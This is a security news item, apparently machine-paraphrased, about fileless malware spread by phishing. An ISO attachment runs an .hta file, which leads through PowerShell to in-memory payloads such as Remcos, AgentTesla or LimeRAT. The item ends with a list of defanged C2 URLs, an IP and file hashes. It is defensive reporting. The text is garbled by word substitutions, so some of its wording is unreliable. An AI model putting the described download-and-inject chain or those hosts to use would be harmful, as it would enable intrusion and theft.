Beware of New Fileless Malware that Propagates Through Spam Mail
Most up-to-date experiences counsel threat actors comprise mature phishing emails to distribute fileless malware. The attachment includes a .hta (HTML Utility) file, that could perhaps well furthermore be mature for deploying other malware love AgentTesla, Remcos, and LimeRAT.
This fileless malware is a Portable Executable (PE) layout, which will get executed without organising the file on the sufferer’s machine. The phishing e-mail has the body context stating a bank switch sight. Besides to the e-mail, the e-mail has an attachment with an ISO image embedded with a .hta script file. This file runs utilizing the mshta.exe (Microsoft HTML Utility).
Fileless Malware By ability of Unsolicited mail Mail
As per experiences shared with Cyber Security News, when the victims attain this ISO file, the embedded .hta file will get executed, which creates a job tree that includes mshta.exe, cmd.exe, powershell.exe, and RegAsm.exe processes in command.
The mshta.exe job executes a Powershell command. The command includes arguments to quiz a base64 encoded string form files from the server (DownloadString), which loads the CurrentDomain.Load files to call a characteristic. Alternatively, there could be now not any binary created valid into a PE file, nonetheless as an alternate, the binary will get executed in the memory residence of Powershell.
Moreover, the Powershell script furthermore executes a DLL file decoded from a Base64 string. This DLL downloads the final binary from the C2 server and injects it into the RegAsm.exe (Assembly Registration Application). This final binary could perhaps well be any malware love Remcos, AgentTesla, or LimeRAT.
A entire fable has been printed by AhnLab, which gives detailed files about the malware, PE file, DLL file, and others.
Indicator of Compromise
Behavior Detection
Connection/EDR.Behavior.M2650
Execution/MDP.Powershell.M10668
File Detection
Downloader/Script.Generic
Trojan/Win.Generic.R526355
URL & C2
hxxps[:][/][/]cdn[.]pixelbin[.]io[/]v2[/]red-wildflower-1b0af4[/]original[/]hta[.]txt
hxxp[:][/][/]195[.]178[.]120[.]24[/]investorbase64[.]txt
MD5
43e75fb2283765ebacf10135f598e98c (.hta)
540d3bc5982322843934504ad584f370 (.dll)
Protect suggested about the latest Cyber Security News by following us on Google News, Linkedin, Twitter, and Facebook.
Source credit : cybersecuritynews.com